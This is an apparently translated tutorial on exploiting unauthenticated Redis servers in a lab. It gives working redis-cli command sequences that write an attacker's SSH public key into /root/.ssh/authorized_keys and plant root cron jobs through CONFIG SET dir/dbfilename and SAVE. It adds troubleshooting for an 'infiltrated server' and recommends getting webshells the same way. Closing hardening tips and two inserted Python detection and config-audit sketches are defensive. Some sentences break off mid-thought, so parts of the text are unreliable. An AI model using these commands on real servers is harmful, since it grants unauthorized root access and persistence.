Redis unauthorized password-free login with SSH and repair solutions

Source: Internet
Author: User


This article introduces what Redis is, the Redis clients redis-cli and Redis Desktop Manager, and common Redis key operation and configuration commands. It then describes how unauthorized access to Redis can be used to write a public key for SSH password-free login, and the related repair solutions. This document consists

Original by ushen, recommended by the red guest Alliance

Redis unauthorized access host: CentOS 7, 192.168.199.166
Hacker host: Kali 2016, 192.168.199.199

1. What is Redis?

Redis is an open-source key-value database written in ANSI C that provides APIs in multiple languages. Key-value means that each key corresponds to a value; the value can also be null. Like memcached, data is cached in memory to ensure efficiency. The difference is that Redis periodically writes updated data to disk, or you can manually enter the save command to save it on the server. In addition, master-slave synchronization is implemented.


2. Redis Client

After Redis is installed, the default port is 6379.
By default, the Redis configuration does not allow external connections; to allow them you need to manually modify /etc/redis.conf.
By default, Redis does not require any account or password for connection.
After Redis is installed, a server program named "redis-server" is used to start the Redis service; the start command is "redis-server /etc/redis.conf".
After Redis is installed, a client named "redis-cli" is also created by default for connecting to the Redis database. It can connect to Redis on other hosts as well.

Detailed description of redis-cli client commands

Common redis-cli commands:

-h: specify the host IP address or domain name
-p: specify the connection port
-a: specify the password
-r: execute the specified command
-n: select the database
-x: use the last parameter, read from standard input, as the value

From the hacker host Kali we connect to Redis on the target host CentOS. If we execute the keys * command and no authentication-required error is returned, the target Redis does not require password authentication.


GUI client: Redis Desktop Manager

To connect to Redis through a GUI, click Connect to Redis Server to create a connection and manage Redis data. To execute commands, right-click "centos" and choose Console to open the Redis command line interface, which is displayed in the bottom right corner.


3. Common Redis commands

Key operation commands

set key value: create a key with the corresponding value. For example, in set test 123456, test is the key and 123456 is the value.

get key: get the value of a key.

keys *: get all keys. Wildcards can also be used to search for specific keys.

expire key 10: set the key's expiration time to 10 seconds. After 10 seconds the key is gone.

del key: delete a key.

Server operation commands

info: get basic information about Redis and the server.

config get dir: get the backup directory.

config set dir /root/: set the Redis backup path to /root/. If a permission error is displayed, you do not have permission to set this directory.

config set dbfilename test.php: set the backup file name to test.php. The default value is dump.rdb.

config get dbfilename: get the name of the backup file.

save: back up the database content to the local disk. By default, the backup is placed in the src directory where Redis is installed, under the name dump.rdb.

4. Unauthorized Redis access leading to SSH password-free login

Prerequisites:
Redis runs with root permissions.
The server has a .ssh directory. I heard that it exists after SSH has been used to log on, but I did not think so.

ssh-keygen -t rsa generates a public/private key pair.

Run the following command in the ~/.ssh directory:
(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > key.txt
The command outputs the content of id_rsa.pub to key.txt, and adds two blank lines before and after it to prevent errors.

cat key.txt | redis-cli -h 192.168.199.166 -x set crackit

This command connects to Redis on the target 192.168.199.166 and, through the -x option, sets the content of key.txt as the value of the key "crackit". In fact, the other database already has a key-value

redis-cli -h 192.168.199.166 # connect to the Redis of the target host
config get dir # obtain the Redis backup path
config set dir /root/.ssh # set the backup path of the database
config set dbfilename authorized_keys # set the backup file name to authorized_keys
config get dbfilename # check whether the backup file name is correctly set
keys * # check whether our key was successfully created
save # save the data to the hard disk

Password-free logon is successful.

Principle: a piece of data is inserted into the database with the local public key as the value and an arbitrary key name. The backup path of the database is then set to /root/.ssh and the backup file name to authorized_keys, so that saving generates an authorized key file in that path on the target server.

Note: We recommend that you use this vulnerability to obtain webshells and obtain ssh. Because save backs up the entire database, a lot of messy data is backed up into the authorized key file, which can lead to connection failure. In a webshell, parsing errors are less likely.
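The "messy data" described above is also what gives the technique away to a defender: the file written by save is a Redis RDB snapshot, which begins with the ASCII magic REDIS followed by a four-digit version. The following detection sketch is an added example, not part of the original article; the function names, the sample bytes and the path /var/lib/redis are constructed for illustration.

```python
import re

# An RDB snapshot starts with "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")
KEY_LINE = re.compile(rb"(ssh-(rsa|dss|ed25519)|ecdsa-sha2-\S+) [A-Za-z0-9+/=]+( .*)?")

def inspect_file(data: bytes) -> dict:
    """Classify bytes read from an authorized_keys or crontab file."""
    # Count bytes that never occur in a hand-written text file.
    non_printable = sum(1 for b in data if b < 9 or 13 < b < 32 or b > 126)
    keys = [line.strip().decode("ascii", "replace")
            for line in data.split(b"\n") if KEY_LINE.fullmatch(line.strip())]
    rdb = bool(RDB_MAGIC.match(data))
    return {"rdb_header": rdb, "non_printable": non_printable,
            "embedded_keys": keys, "suspicious": rdb or non_printable > 0}

def risky_save_target(conf_dir: str, dbfilename: str) -> bool:
    """Evaluate the values returned by CONFIG GET dir and CONFIG GET dbfilename."""
    d = conf_dir.rstrip("/")
    return (d.endswith("/.ssh") or d.startswith("/var/spool/cron")
            or not dbfilename.endswith(".rdb"))

# Constructed sample: an RDB-like dump holding one key whose value is a
# newline-padded public key, as produced by the procedure in this section.
SAMPLE_DUMP = (b"REDIS0007\xfa\tredis-ver\x063.2.12\xfe\x00\xfb\x01\x00\x00\x07crackit\x40\x50"
               b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAB constructed@example\n\n\xff\x00\x01")
# Constructed sample: a normal authorized_keys file.
CLEAN_KEYS = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA admin@constructed\n"

if __name__ == "__main__":
    print(inspect_file(SAMPLE_DUMP))
    print(inspect_file(CLEAN_KEYS))
    print(risky_save_target("/root/.ssh", "authorized_keys"))
```

Run inspect_file over every authorized_keys file and every file under /var/spool/cron, and risky_save_target over the live configuration of each Redis instance.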

5. Solving the problem that logon with the Redis-written public key fails

Some friends still cannot log on without a password when using the Redis public key. Why?
Solution

A. Generate authorized_keys from your public key using the above method, and then try to log on locally (local test mode) with ssh localhost. If you can log on normally, the authorized key is correct.

B. The permission of the authorized key file on the infiltrated server should be 600.
Use the Linux task plan (cron) to set the permission of authorized_keys to 600.
echo -e "\n*/1 * * * * /bin/chmod 600 ~/.ssh/authorized_keys\n" | redis-cli -h 127.0.0.1 -x set 1
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/
redis-cli -h 127.0.0.1 config set dbfilename root
redis-cli -h 127.0.0.1 save

Explanation: the above is again a process of saving Redis data, but the data is saved under the name root and stored under /var/spool/cron. The value of key 1 is a scheduled task that, one minute after it is scheduled, runs chmod 600 to set the permission of authorized_keys to 600.

C. The server does not have a .ssh directory.

Use the Linux task plan to create the folder.
echo -e "\n*/1 * * * * /bin/mkdir ~/.ssh\n" | redis-cli -h 127.0.0.1 -x set 2
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/
redis-cli -h 127.0.0.1 config set dbfilename root
redis-cli -h 127.0.0.1 save

D. .ssh directory permissions

Use the Linux task plan to set the permission of the .ssh directory.
echo -e "\n*/1 * * * * /bin/chmod 700 /home/root/.ssh/\n" | redis-cli -h 127.0.0.1 -x set 1
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/
redis-cli -h 127.0.0.1 config set dbfilename root
redis-cli -h 127.0.0.1 save

6. Solutions

Do not start Redis as root.
Modify redis.conf in the installation directory and set bind to a specified IP address, or to 127.0.0.1 so that only local logon is possible.
Set a password: requirepass test123!@#$
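The three fixes above can be checked mechanically. The following audit sketch is an added example, not part of the original article; the function names, the finding codes, both sample configurations and the service account name "redis" are assumptions made for illustration.

```python
def parse_redis_conf(text: str) -> dict:
    """Map each directive to its arguments; this sketch keeps the last occurrence."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        # Only lines that start with '#' are treated as comments, so a '#'
        # inside a password such as test123!@#$ is preserved.
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        conf[name.lower()] = args
    return conf

def audit(text: str, run_user: str) -> list:
    """Return (code, message) findings for the three fixes listed above."""
    conf = parse_redis_conf(text)
    findings = []
    if run_user == "root":
        findings.append(("runs-as-root",
                         "redis-server runs as root, so save can write anywhere"))
    bind = conf.get("bind", [])
    if not bind or any(addr in ("0.0.0.0", "::", "*") for addr in bind):
        findings.append(("bind-exposed",
                         "bind is missing or covers all interfaces"))
    if not conf.get("requirepass"):
        findings.append(("no-requirepass",
                         "no password is required to connect"))
    return findings

# Constructed sample: the weak setup this article starts from.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
dir /var/lib/redis
"""
# Constructed sample: the same file with the fixes from this section applied.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
requirepass test123!@#$
"""

if __name__ == "__main__":
    for code, message in audit(WEAK_CONF, run_user="root"):
        print(code, "-", message)
    print(audit(HARDENED_CONF, run_user="redis"))
```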

 
